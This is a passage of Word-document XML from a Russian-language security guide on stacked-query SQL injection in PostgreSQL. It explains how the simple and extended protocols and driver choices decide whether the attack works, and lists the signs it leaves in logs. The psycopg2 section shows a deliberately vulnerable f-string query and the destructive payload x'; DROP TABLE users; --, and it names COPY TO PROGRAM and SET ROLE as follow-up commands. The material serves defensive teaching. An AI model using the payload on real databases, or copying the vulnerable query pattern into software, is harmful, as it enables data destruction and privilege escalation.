        <w:t xml:space="preserve">4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атака, при которой через инъекцию в один SQL-запрос подаются несколько команд, разделённых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классическом MySQL-мире это либо «всегда работает», либо «всегда блокировано» — на уровне сервера. В PostgreSQL ситуация другая: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сервер всегда поддерживает мульти-команды в simple query, и всегда отказывает в extended query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 2.1 про протоколы wire). Уязвимость живёт не в сервере, а в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">выборе драйвером протокола</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и в том, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">передаёт ли разработчик параметры через API драйвера</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Два режима wire-protocol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Simple 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 frontend message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сервер принимает строку SQL целиком и парсит её как последовательность statement-ов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Стакинг работает.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Extended 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PQexecParams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PQprepare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PQexecPrepared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, сообщения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse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Bind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сервер парсит ровно одну команду. На второй команде в строке возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ещё на этапе Parse — до Bind, до Execute, до того как payload достигнет планировщика.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что определяет режим в коде</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый драйвер выбирает протокол по своим правилам. Главный вход — наличие или отсутствие параметров в API-вызове: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Режим протокола →</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Простой (simple)</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Расширенный (extended)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Параметры переданы драйверу</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Зависит от драйвера (asyncpg, Java statement)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Стакинг блокирован</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Параметры НЕ переданы (raw SQL)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Стакинг проходит</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140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому правило «параметризованные запросы защищают от инъекций» в PostgreSQL верно только если параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">действительно ушла в API драйвера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через отдельный аргумент, а не была собрана в строку через f-string /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конкатенацию. Также есть драйверы с явным переключателем (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgjdbc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple_protocol=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgx) — он принудительно переводит даже параметризованные вызовы в simple, и стакинг возвращается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт, если стакинг прошёл</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вторая команда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исполняется в той же сессии, под теми же привилегиями, в той же транзакции (если она открыта). Если приложение работает в autocommit-режиме —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GRANT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коммитятся немедленно. Если стакинг внутри явной транзакции — действие применяется при commit. Возвращается только результат последней команды, поэтому первый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приложение увидит как пустой ответ (или как сбой курсора), а DDL/DML тихо пройдут на сервере. Эти эффекты общие для всех подразделов 3.5.1–3.5.6 и в них не дублируются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах</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литерала параметра, попавшего в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement=all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкретный маркер: точка с запятой между значимыми SQL-токенами, не внутри обычной строки данных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log_statement=ddl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log_statement=mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DDL/DML от application-роли, которая по своей бизнес-логике DDL/DML не делает (например,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от роли read-only API)</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записи с двумя нормализованными командами в одной строке (видны как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... ; ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после нормализации, специфично для simple-protocol)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Ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application-роли — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сигнал неудавшейся атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в extended-режиме: payload дошёл до сервера, но был отклонён на Parse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти сигналы общие для всех подразделов 3.5.1–3.5.6 и далее не повторяются.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data-modifying CTE) — альтернативный способ получить side-effect одной командой, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH … AS (INSERT/UPDATE/DELETE)</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Работает даже в extended-режиме. Граница: 3.5 — несколько команд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3.10 — одна команда с WITH.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (COPY FROM/TO PROGRAM) — типичная «вторая команда»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эскалации до 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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SET ROLE) — «вторая команда» для смены привилегий внутри stacked-пачки.</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3.5.1 psycopg2 (text-mode default)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3.5.2 psycopg3 (extended default)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3.5.3 asyncpg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3.5.4 pgjdbc (Statement vs PreparedStatement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode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3.5.5 pgx (Go, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple_protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode)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3.5.6 node-postgres (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg.query(text)</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pg.query(text, values)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3.5.7 Итоговая таблица: драйвер × режим → проходит ли стакинг</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.1 psycopg2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> psycopg2 (актуальная ветка 2.9.x) — синхронный драйвер на базе libpq. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> всегда использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query protocol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 независимо от того, переданы ли параметры. Параметризация в psycopg2 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">клиентская подстановка с экранированием через `adapt()`/`mogrify()`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не передача параметров в extended-protocol. Это означает, что защита от stacked queries в psycopg2 опирается на корректность экранирования кавычек, а не на отказ сервера от мульти-команд.</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import psycopg2</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conn = psycopg2.connect(dsn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur = conn.cursor()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search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</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в f-string — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mogrify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не вызывается, экранирования нет, любой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уйдёт как разделитель команд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT id, email FROM users WHERE name = %s", (name,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 placeholder psycopg2 (не % из Python-форматирования). Значение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проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adapt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который оборачивает строку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удваивает внутренние одиночные кавычки. Получившаяся уже-готовая SQL-строка уходит одной командой через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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Единственный режим — simple. Extended-protocol через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> недостижим (psycopg2 не вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQexecParams</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит (уязвимый код):</w:t>
